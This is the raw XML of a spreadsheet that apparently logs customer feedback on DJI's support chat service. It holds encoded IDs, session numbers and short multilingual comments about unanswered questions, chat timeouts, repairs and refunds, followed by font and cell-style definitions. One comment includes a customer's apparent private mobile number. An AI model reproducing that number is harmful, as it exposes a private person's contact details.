      <t>두대사용가능한가요</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>HDLm/pdPuYgGmOUtP1QPaf3Oj4i+LioCUrJ0U6lSrbg=</t>
  </si>
  <si>
    <t>329a92b8053b977770cf7bb54b6c1792</t>
  </si>
  <si>
    <t>|82488909141325715081563</t>
  </si>
  <si>
    <t>5wiIho8t1aZfn8QyRQKGMg==</t>
  </si>
  <si>
    <t>It understood and answered my querries. I got all the information I needed.</t>
  </si>
  <si>
    <t>kdCsl16ItFfkX9sZdpHMb9B2cmoOiHypL/+PEs9c/sY=</t>
  </si>
  <si>
    <t>a43f457c9df0668ae67678557873e889</t>
  </si>
  <si>
    <t>|82488324320615483235102</t>
  </si>
  <si>
    <t>eMhUWXCSlixSkTv1C01oQA==</t>
  </si>
  <si>
    <t>Why is the care service unavailable? I activated the Air 3 S today</t>
  </si>
  <si>
    <t>pa+nAz4ItyxaT8cmQe7DBzL42a02OWvYIn8/3qdFMoI=</t>
  </si>
  <si>
    <t>7603f47fdb82fd2a65f566a8c741cb7c</t>
  </si>
  <si>
    <t>|82488099611912938020904</t>
  </si>
  <si>
    <t>kS1eeajmpcHb9lgt3EZI0lhOJmxVCLAjpOKt0gzwPHs=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>감사합니다</t>
    </r>
  </si>
  <si>
    <t>JeiYA+tSdrZO/YYO81TlB7INqA3Bz5Jb/2vmnceLFlw=</t>
  </si>
  <si>
    <t>a8f3114e5f417309d048b21c560b9672</t>
  </si>
  <si>
    <t>|82487243125265714622494</t>
  </si>
  <si>
    <t>0IKXVDpYM1s/QgYQFMSeuiOiKiBXGkByTdZEszJcjcQ=</t>
  </si>
  <si>
    <t>Servizio impeccabile e risolutore come sempre. DJI World sono i numeri 1 !</t>
  </si>
  <si>
    <t>Q6GTuresQPt4oMv3fqBvqo2x9Pe7LcpvdiJcT7pUQaE=</t>
  </si>
  <si>
    <t>ef596273e7a9664ccbb83e1478293442</t>
  </si>
  <si>
    <t>|82487363641129529147152</t>
  </si>
  <si>
    <t>访客-28f832</t>
  </si>
  <si>
    <t>Finde keine Kontaktmöglichkeit bei Software Problem mit osmo mobile 7p und mimo App</t>
  </si>
  <si>
    <t>f38742699cd2644c75287ca1c1a51670</t>
  </si>
  <si>
    <t>1881eff75aa4d5deb9a1057e3bcf2f2a</t>
  </si>
  <si>
    <t>|82486992327869120617933</t>
  </si>
  <si>
    <t>zWGxFybc6bEUW6Lh5EiZTNGB7bcRSX7E7jKO6vymooQ=</t>
  </si>
  <si>
    <t>Quick and efficient. Thank you</t>
  </si>
  <si>
    <t>/dqhxF5wjUe3K0Rj3j5whA==</t>
  </si>
  <si>
    <t>3d4b03c636357096d7aa1c8af659a225</t>
  </si>
  <si>
    <t>|82487201071676640535182</t>
  </si>
  <si>
    <t>NogFGclN7VcAjA2zpRbb1w==</t>
  </si>
  <si>
    <t>ordini e pagamenti</t>
  </si>
  <si>
    <t>5RFM2IsFsFCgScI4PG+7aAC02dmRWjKrIFamaOmcVrA=</t>
  </si>
  <si>
    <t>81c46d912403e4a192b9c3fdc6348cd5</t>
  </si>
  <si>
    <t>|82487945854402453264650</t>
  </si>
  <si>
    <t>访客-ce8e2a</t>
  </si>
  <si>
    <t>Hallo, ich möchte den Kostenvoranschlag annehmen und bezahlen, aber leider habe ich keine Info bekom</t>
  </si>
  <si>
    <t>6a2c6593d865064e00f8e5ef08dc0623</t>
  </si>
  <si>
    <t>a4cf5e3c8d101995552133a920aa086c</t>
  </si>
  <si>
    <t>|82486486430934800195550</t>
  </si>
  <si>
    <t>jLEcGmPBs3dM/3F7RT9jUA==</t>
  </si>
  <si>
    <t xml:space="preserve">I was writing a message and then it timed out before I could finish
</t>
  </si>
  <si>
    <t>qDoAH69LznsA3qMcywoGWXdCxtgerf8hHXIc3ci4H4s=</t>
  </si>
  <si>
    <t>8d1c24164f8b39e92c0ff3e10aa6a166</t>
  </si>
  <si>
    <t>|82486292049875351749082</t>
  </si>
  <si>
    <t>dig8ollJUS0AEQDN38kBgDeFxrjcF3icl16CunHKzvE=</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to purchase a drone for my brother. Is the DJI neo best to start with
</t>
  </si>
  <si>
    <t>9walmR/pDLbJuu35O2c5agzIefkp1jiHB+hzxeC7P74=</t>
  </si>
  <si>
    <t>e78815fbe2b03a1f6edc915ad13dd172</t>
  </si>
  <si>
    <t>|82485699362812718173103</t>
  </si>
  <si>
    <t>9FxZE7Fk9ccl5MFESd7+tJeCetHFzWXGg/4wzu/nK68=</t>
  </si>
  <si>
    <t xml:space="preserve">It's so hard to find the app in the play store,
I couldn't find it anywhere. </t>
  </si>
  <si>
    <t>0vBi6QGrsjlVR57CbDp//r1ElvRpRC6AJ7zGTYwLv50=</t>
  </si>
  <si>
    <t>33a20d31b453dec14fa13a0f79651d13</t>
  </si>
  <si>
    <t>|82485168494774127718416</t>
  </si>
  <si>
    <t>zfdTzEHGX8CqrQ9e61l/xyfVi15xAKAMXGO0qY1xjCE=</t>
  </si>
  <si>
    <t xml:space="preserve">IT WENT BY TOO FAST AND MY ISSUE WASNT RESOLVED
</t>
  </si>
  <si>
    <t>EUYHB+0KKk1R/U8n1yjPIMQRuZ/vBjFEtZ2QzZOP0yU=</t>
  </si>
  <si>
    <t>bb7815d5dd9dd66aac78f188033f0351</t>
  </si>
  <si>
    <t>|82484509087549127268457</t>
  </si>
  <si>
    <t>00LBNSyusnGUuZ68FlpeuEE1pctu8GQWnpcPCTaZfsg=</t>
  </si>
  <si>
    <t xml:space="preserve">Didn't solve my problem. </t>
  </si>
  <si>
    <t>yvsNOGSgUFJKNBYmonaJIBiDq9uchY6N5eRaFQnX5w8=</t>
  </si>
  <si>
    <t>e415e47ebd4e0a9c3d3738a48797be5a</t>
  </si>
  <si>
    <t>|82484303859683618925411</t>
  </si>
  <si>
    <t>PNn7SAJLEScJ60L8T3b5wg==</t>
  </si>
  <si>
    <t>This is trash</t>
  </si>
  <si>
    <t>WKS+vmKnwQYKgqWcw8oOFxZZubwNKG/7nDSfnFEDCV8=</t>
  </si>
  <si>
    <t>d4f8cd0a7977d902aa8c8c9fb0ca4068</t>
  </si>
  <si>
    <t>|82484609508772958394265</t>
  </si>
  <si>
    <t>O9z0fzrQ+q6Fn9Kwjsh+EoC4ZhkWgl0l5bjc7OZ7Jf4=</t>
  </si>
  <si>
    <t>you did not answer me.
I do not hear any sound...
please contact me on my mobile +33 612 90 10 91</t>
  </si>
  <si>
    <t>cbIfFzYU8rjnd6EZyoy+QxUIv1pUIcLXbSn4pY4MM8A=</t>
  </si>
  <si>
    <t>fa8cdb3bc52e7108f3fa26dc33edd123</t>
  </si>
  <si>
    <t>|82483379552861898841932</t>
  </si>
  <si>
    <t>访客-9b6120</t>
  </si>
  <si>
    <t xml:space="preserve">He gave me clarity. </t>
  </si>
  <si>
    <t>08d44e9de3e8374572d9828a4b2e91af</t>
  </si>
  <si>
    <t>a500677e496986ab91ba2c00cc840165</t>
  </si>
  <si>
    <t>|82483095764807360956282</t>
  </si>
  <si>
    <t>mJzKHKAin39J1WR3SOL0Ew==</t>
  </si>
  <si>
    <t>Doesn't help at all.</t>
  </si>
  <si>
    <t>rfVIBkz0bPcaZbHazJ/LlzRMjgIIQ6NPcDtt7AtImG4=</t>
  </si>
  <si>
    <t>bb199e4a42d59d1d872d588c219f85ed</t>
  </si>
  <si>
    <t>|82482959613977481280257</t>
  </si>
  <si>
    <t>o5VpdLKZPr5J5k2P1tW1bqX/8jFjIYH/F7edHqrrKzo=</t>
  </si>
  <si>
    <t>mauvaise reponse a ma question</t>
  </si>
  <si>
    <t>6w7SaFLF0KQ2986Zf5FIAvS9zggnGhxtR5D8zxu2lc8=</t>
  </si>
  <si>
    <t>0e68aa5960d82390def8a6ec4a32a207</t>
  </si>
  <si>
    <t>|82482890624475153538637</t>
  </si>
  <si>
    <t>07pGH0F+B4aWb995rbNFlQ==</t>
  </si>
  <si>
    <t>Weniger kompliziertes und damit kundenfreundlicheres Handling bei Service- und Statusanfragen</t>
  </si>
  <si>
    <t>rG2xfTKQdYOVXssKalckQkLLFGjZxSDjeB6EmEp8FCc=</t>
  </si>
  <si>
    <t>bc3bdc0dc6356c88e67677414a33c67f</t>
  </si>
  <si>
    <t>|82482454752257491584637</t>
  </si>
  <si>
    <t>X1jIH0u5a8WFLtaAw5VxMjKrnQ19yaLnzYKtSPKIPAY=</t>
  </si>
  <si>
    <t>I was offered 4 useless choices.  None of them matched what I needed.  Where is the "other" category</t>
  </si>
  <si>
    <t>17HiYBu4iOzD7Hw4kxhWafH7p9UmZBovK/CYK8HUMtw=</t>
  </si>
  <si>
    <t>3902c148d2ae1de2b54ff6f6e9ce55ac</t>
  </si>
  <si>
    <t>|82482591022879365326753</t>
  </si>
  <si>
    <t>giu6qNnYTUwr5xs4WOkPli7ZO0IIIv2dGCkmc2F8AjI=</t>
  </si>
  <si>
    <t>I did not get to ask my question because the meal was ready!  No problem, just wish to resume now!</t>
  </si>
  <si>
    <t>ESDBQiLvGorTXfuohQlOX+CyaijnTpnrklQSTEFoHLw=</t>
  </si>
  <si>
    <t>6ed59043f76e8dcf4bc7c7ef9a71542e</t>
  </si>
  <si>
    <t>|82480791971885530279393</t>
  </si>
  <si>
    <t>GsCFZGd23VpzxiP+p9iMjIy9jFHpUpWwyt+FaIzVyrE=</t>
  </si>
  <si>
    <t>I typed in my message and submitted it and 5 seconds later a message closing chat for idle.  Absurd.</t>
  </si>
  <si>
    <t>njabq3hiJEPx2AcYxSJmbg5QXY6bbaxDKz4c7Otnrp4=</t>
  </si>
  <si>
    <t>a7f641a8ffa12ad785bb3a487d56cfd4</t>
  </si>
  <si>
    <t>|82480316232713339471854</t>
  </si>
  <si>
    <t>VBrePumMv/wTpENdiC11ew==</t>
  </si>
  <si>
    <t>got nowhere close to what I was trying to ask</t>
  </si>
  <si>
    <t>wM9Hu1shRKH67gCEkv/FJQ==</t>
  </si>
  <si>
    <t>eb5dd3433258520e76b83ad630cab171</t>
  </si>
  <si>
    <t>|82480096619376445511824</t>
  </si>
  <si>
    <t>MuuJETuZkrNn03GHQK3ZUJxanI3qmCXe4vIVL3IGTSo=</t>
  </si>
  <si>
    <t>The Assistant gave me information on a drone then i wrote pocket 3</t>
  </si>
  <si>
    <t>bVbqdxt2ZqnRW19K60hLaFovtTI2SsrcgbolHYZskzk=</t>
  </si>
  <si>
    <t>f4192a04deefded12a26bbc00727d26b</t>
  </si>
  <si>
    <t>|82480068755953711942031</t>
  </si>
  <si>
    <t>YsD7IaAnI29WrzldahvTpM6nCEMDY8rwJ3M0tKTJnnk=</t>
  </si>
  <si>
    <t>I think the info might help but actually being able to speak to a human being would be more helpful</t>
  </si>
  <si>
    <t>0uEiy0FKAbcpoKUUSxOyFsC0dwsuHBdz/uj5ZTG8y4I=</t>
  </si>
  <si>
    <t>5e0224b19509dfd71d999c8b2cd964d1</t>
  </si>
  <si>
    <t>|82479901674889949695616</t>
  </si>
  <si>
    <t>vUFDFTv95uo3aEK1SLepvA==</t>
  </si>
  <si>
    <t>I need to know how I can limit the AC power charging rate of my dji 1000 power supply to under 400w.</t>
  </si>
  <si>
    <t>8Cg4yBZloMi/1m6hFPHqlcoqZjroFZSAFZZlPBxjO3w=</t>
  </si>
  <si>
    <t>d21d935d8c1ea452027f6e1d70aedb94</t>
  </si>
  <si>
    <t>|82479574548163028931522</t>
  </si>
  <si>
    <t>TKXXIx7SzjqJtW9pt0vnDA==</t>
  </si>
  <si>
    <t>I keep getting Scan QR Failed when I Scan the QR code</t>
  </si>
  <si>
    <t>hyKER0keiJvY+VeknCtWIJQvVar7kv+b4cdwJu2NK6s=</t>
  </si>
  <si>
    <t>e680b33bc5fb975a7b25551b8ab8544c</t>
  </si>
  <si>
    <t>|82479457671409877719465</t>
  </si>
  <si>
    <t>+L18jrsadu32bpvUnbKejA==</t>
  </si>
  <si>
    <t xml:space="preserve">Est ce que je peux gérer DJI osmo pocket 3 et DJI osmo mobile 6 sur mon téléphone Android ? </t>
  </si>
  <si>
    <t>lw5B3deYWZqUiqmt+y7q6R0G4FM9CIikUxs2fApOGYA=</t>
  </si>
  <si>
    <t>c68943cdd31d528351bb796e99cf3d81</t>
  </si>
  <si>
    <t>|82479345715875517152789</t>
  </si>
  <si>
    <t>HS1hofCXO3SJuHfzK8UQ+qS7kYrmEiTd9/CJ42Oc7S8=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>실사용</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>한번도</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>안했는데</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>짐벌</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>동작</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>안함</t>
    </r>
  </si>
  <si>
    <t>NheRUjL0oZwLZzMuokLsSyDUcoOjff47zSWokTkMYr0=</t>
  </si>
  <si>
    <t>e32ab6141be3ddb579a2de01fbb4a51c</t>
  </si>
  <si>
    <t>|82479001726262314972277</t>
  </si>
  <si>
    <t>kxYI+Bgp726oUPE8rRfgjg==</t>
  </si>
  <si>
    <t>I want a full refund I'm disputing the charges</t>
  </si>
  <si>
    <t>VUaJnfVZdI6MjsQnb52FvvM+p03/8Oto+cTTWiOXtZY=</t>
  </si>
  <si>
    <t>521a0ff39077f5fc2af819e1a2e9a63a</t>
  </si>
  <si>
    <t>|82478810712038029668029</t>
  </si>
  <si>
    <t>ba2eTSp2UjHxKcRaQfpyb/6hyr7YVa/yvJJ1Wv0Q1FoFyAU7pz7Y7c8zRB9/KFPC</t>
  </si>
  <si>
    <t>It's hard to ask some
Help</t>
  </si>
  <si>
    <t>lkhSJMNSmxPhU6p2e2ITqIoeirQfKO6giwNxu5v1vK8=</t>
  </si>
  <si>
    <t>221ba839c3b7d7cc98a4874ec85dd94c</t>
  </si>
  <si>
    <t>|82478215196725636589950</t>
  </si>
  <si>
    <t>bgyQmtbGZu1wgJendc/fDtU6i+lof8efTkkgcJ+r2fY=</t>
  </si>
  <si>
    <t>Range of topics is too limited. Need better info on RID confirmation. WTF?</t>
  </si>
  <si>
    <t>B7f7o+r8tYTEuHZGthg8udefZHkYnEfKVes7X9YWG64=</t>
  </si>
  <si>
    <t>e412798ec1b542274182cd2016e270c1</t>
  </si>
  <si>
    <t>|82477707874198375763044</t>
  </si>
  <si>
    <t>XqaoKtpcV8hvxo+IPbOpcSgjeFl7W416YPk95qIXMCQ=</t>
  </si>
  <si>
    <t>My drone has not been repaired nor has it been shipped to me ! But yet your service update shows dif</t>
  </si>
  <si>
    <t>0Fh69j5Gr4bER432LoqzmyvSb3uDpOVq6wA8QQGtyEc=</t>
  </si>
  <si>
    <t>71c77a66e0e3b7f8e9a19f00f3402ce7</t>
  </si>
  <si>
    <t>|82477578803183940669430</t>
  </si>
  <si>
    <t>/Y+Hcymb2R1TtwqRtfMmgA==</t>
  </si>
  <si>
    <t xml:space="preserve">It didn't answer my question
</t>
  </si>
  <si>
    <t>4iacHmeeot6H8+wg6sW4YA==</t>
  </si>
  <si>
    <t>98bc6a7ab1c6c491a8d97b155e8b431d</t>
  </si>
  <si>
    <t>|82477640399235925062173</t>
  </si>
  <si>
    <t>VL8zLu1PkAwaTXOFsehDciYE4QzSBz4xep+7HxXzGmo=</t>
  </si>
  <si>
    <t>You are the best! Thank you!</t>
  </si>
  <si>
    <t>dpk9MCW8BEWtmqTPr/cQ0quKumzYtCzCYGyJHD3F9Gk=</t>
  </si>
  <si>
    <t>5c0d4918dab7707d12e08c99c915825b</t>
  </si>
  <si>
    <t>|82477647287519138354474</t>
  </si>
  <si>
    <t>3fCzbk2QOrDrT4RMgnjYTA==</t>
  </si>
  <si>
    <t>I didn't receive the code yet</t>
  </si>
  <si>
    <t>z3QZXcNP2oeL+77J+/6M79GU4u1SlTmPLCxa/jxtTjM=</t>
  </si>
  <si>
    <t>e9c05fed6212ec7e6f08bede03e2f2ec</t>
  </si>
  <si>
    <t>|82476843418357198371295</t>
  </si>
  <si>
    <t>dr4FjZFhZVoOrUdzLpnflx0ukWxygrzpIcJnvMKbiLQ=</t>
  </si>
  <si>
    <t xml:space="preserve">I have not used it and you already ask me a question about the help service. </t>
  </si>
  <si>
    <t>oErqQAuUzTyXoUQr90DW976T5Ae4C/19mJ3l2sXtdqY=</t>
  </si>
  <si>
    <t>fd4aafd37e0a02e2e4613800f201e547</t>
  </si>
  <si>
    <t>|82476806227516531156914</t>
  </si>
  <si>
    <t>B2MFsCNmqLDROWs7VnQpC0dtyB0VocmqcKnbLt+IYsE=</t>
  </si>
  <si>
    <t>NON HO AVUTO ANCORA RISPOSTA</t>
  </si>
  <si>
    <t>GRVz12RoSxwpDVmu9RwpBFT8e3qZ+ube2GAbE/hAH3I=</t>
  </si>
  <si>
    <t>6e52c778934f73ad19a0ec940e482b61</t>
  </si>
  <si>
    <t>|82475818889937366067613</t>
  </si>
  <si>
    <t>KDqopYDu1RbgdHV0GjAmgQ==</t>
  </si>
  <si>
    <t xml:space="preserve">Very complex to activate osmo pocket 3 camera and could not get a straight answer or help. </t>
  </si>
  <si>
    <t>hbGUFlk9MHDU2Zvhbjp6k8vvUgJ75dI2/y9pJ94yyvI=</t>
  </si>
  <si>
    <t>6f2d3490b281cb320f8a8c811c46930e</t>
  </si>
  <si>
    <t>|82475119974967860144185</t>
  </si>
  <si>
    <t>+wysduE5QWDDDDcZCIto9kIvJX9mApEDRoKaxiSvHR8=</t>
  </si>
  <si>
    <t>didnt answer my actual question</t>
  </si>
  <si>
    <t>I/oCF4IEZgHNX4zM1tYTg0Q6RRvlXf5nxSp2PQPMK/g=</t>
  </si>
  <si>
    <t>c6883600fecc5c0b2d476e1dac62324b</t>
  </si>
  <si>
    <t>|82475074761038016010763</t>
  </si>
  <si>
    <t>b4cKN+gdqpnPYNWHjaYAyQ==</t>
  </si>
  <si>
    <t>die Website ist derart unübersichtlich, dass es dafür nicht einmal 1 Punkt gibt.</t>
  </si>
  <si>
    <t>7SdoLwCuMNXzRJhqQin9s0H/I8mEP5NIx+GyahL3ick=</t>
  </si>
  <si>
    <t>11edd216e9d597a44aebe8d4bdf87a95</t>
  </si>
  <si>
    <t>|82474782867544654174143</t>
  </si>
  <si>
    <t>+Y5cOMkfW3WO0SSGb0U1Eg==</t>
  </si>
  <si>
    <t xml:space="preserve">The answers to my questions were sometimes hard to understand. I asked about where to ship my drone </t>
  </si>
  <si>
    <t>rgfTrTwDMm+7rlRzXqBcO66YWlzkGtmpkKd5CWeCceM=</t>
  </si>
  <si>
    <t>1057cfd593a729dfd3822bf2bf01985b</t>
  </si>
  <si>
    <t>|82475053172387185155066</t>
  </si>
  <si>
    <t>Wpkb92r/kPtU7taLJwauSSKmNVElj4R2lvw/DeKapao=</t>
  </si>
  <si>
    <t>HOLA ADQUIRI EL SERVICIO CARE REFRESH Y AHORA NO ME DEJAR DISFRUTAR DE ESES SERVCIO, HE PERDIDO EL D</t>
  </si>
  <si>
    <t>m9e9SyP5+v8ku6ffh36ni10Vb6mEff20lTyd3DPDCTQ=</t>
  </si>
  <si>
    <t>b4ed369f4347a8a4ebf814c6fa95c515</t>
  </si>
  <si>
    <t>|82474164486475382248484</t>
  </si>
  <si>
    <t>0wAwIJr/z1tv/DUKPCF/LYD+Azr6iW8LvO8BBYSNvXA=</t>
  </si>
  <si>
    <t xml:space="preserve">need more time
</t>
  </si>
  <si>
    <t>vWi6o5eZNF3tuKSSjwQS5zCdTKnFXxE6mENxXvpFWMU=</t>
  </si>
  <si>
    <t>56d2b34433896dafdda721daf4e3b299</t>
  </si>
  <si>
    <t>|82474023442028284636187</t>
  </si>
  <si>
    <t>JizzAjWIRCNrNHV4/9LsEQ==</t>
  </si>
  <si>
    <t>I wish I would have gotten an email acknowledgement right away.</t>
  </si>
  <si>
    <t>VHQqu0Pi3KM/WeNxC4kIEO1fgR9wm/dKq5Y5XpW4M24=</t>
  </si>
  <si>
    <t>18a863a925f284b757325e40f5c61715</t>
  </si>
  <si>
    <t>|82473971601236660333445</t>
  </si>
  <si>
    <t>8+JtFexyrhuBwvkhRalh/Ocpa2IdH8XHqiz5PI+LTGo=</t>
  </si>
  <si>
    <t>My issue was not fixed</t>
  </si>
  <si>
    <t>A5xdRTbadmnvMPjceJ7lSouAhkJhsLViQ02Zzz8qIzw=</t>
  </si>
  <si>
    <t>1ff886037c112dbe696a58f6145b919b</t>
  </si>
  <si>
    <t>|82473874366262674699153</t>
  </si>
  <si>
    <t>b9wUesVo/OLGnlyuUHTYlg==</t>
  </si>
  <si>
    <t>resend for email does not work</t>
  </si>
  <si>
    <t>mmOOIxiVoFsinlLf0wUaeA==</t>
  </si>
  <si>
    <t>5efd676411b44bdd137e326bba80e50c</t>
  </si>
  <si>
    <t>|82473793806991201995516</t>
  </si>
  <si>
    <t>citu25XnPQBZ25u5u1uiWotFfAdXDy4xhr3gF0TaHRg=</t>
  </si>
  <si>
    <t xml:space="preserve">I can't install DJI Mimo on my Android phone.
Getting very frustrated. </t>
  </si>
  <si>
    <t>9OvRKl6ta1f4K4iNc81JUgFic4pBghX0MJJwrn+teEk=</t>
  </si>
  <si>
    <t>68fe31d4b47a52d2fc579ffaa38ed70f</t>
  </si>
  <si>
    <t>|82473412269002378617731</t>
  </si>
  <si>
    <t>访客-14f0da</t>
  </si>
  <si>
    <t>mini 4</t>
  </si>
  <si>
    <t>6f52ed1c85bcf84ecb48169947c5f70c</t>
  </si>
  <si>
    <t>786b9bbaccec845f260872babe8998d9</t>
  </si>
  <si>
    <t>|82473402533829576970993</t>
  </si>
  <si>
    <t>gTpJQ5+3LrYp3g9weMN4gA==</t>
  </si>
  <si>
    <t>Many times I received inadequate answers to my inquiries. This kind of response from the support ser</t>
  </si>
  <si>
    <t>C6HO3+kW9N0GAWAbP+EL9LNiCgDa49Crn5YnbWby1Y0=</t>
  </si>
  <si>
    <t>e5abddff692db703c0ac80903390e4d4</t>
  </si>
  <si>
    <t>|82473395375489187615034</t>
  </si>
  <si>
    <t>The issue cannot be resolved for a long time!</t>
  </si>
  <si>
    <t>5b41364e2661438d9c0a26c32ecfb955</t>
  </si>
  <si>
    <t>|82473195352311465784213</t>
  </si>
  <si>
    <t>OW2a32/m3k6930JEOCQnbw==</t>
  </si>
  <si>
    <t>XBGgo70uKYiYQ5eOv3xkapF4X+V/uPIWSKLkth5YpQM=</t>
  </si>
  <si>
    <t>29b5c1ca39efaa7c641d1322761f4bd1</t>
  </si>
  <si>
    <t>|82473623783757340195290</t>
  </si>
  <si>
    <t>I haven't been able to get help for over a day. They didn't respond to my email.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</si>
</sst>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9">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="0"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF417FF9"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>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汉仪书宋二KW"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="汉仪书宋二KW"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>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9">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="14" fontId="4"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FF0C01"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFFFC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9"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="B1" workbookViewId="0">
      <selection activeCell="K2" sqref="K2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.23076923076923" defaultRowHeight="16.8"/>
  <cols>
    <col min="1" max="2" width="12.0192307692308" customWidth="1"/>
    <col min="3" max="7" width="16.1730769230769" customWidth="1"/>
    <col min="8" max="8" width="43.4326923076923" customWidth="1"/>
    <col min="9" max="9" width="37.1730769230769" customWidth="1"/>
    <col min="10" max="10" width="16.1730769230769" customWidth="1"/>
    <col min="11" max="11" width="23.3942307692308" customWidth="1"/>
  </cols>
  <sheetData>
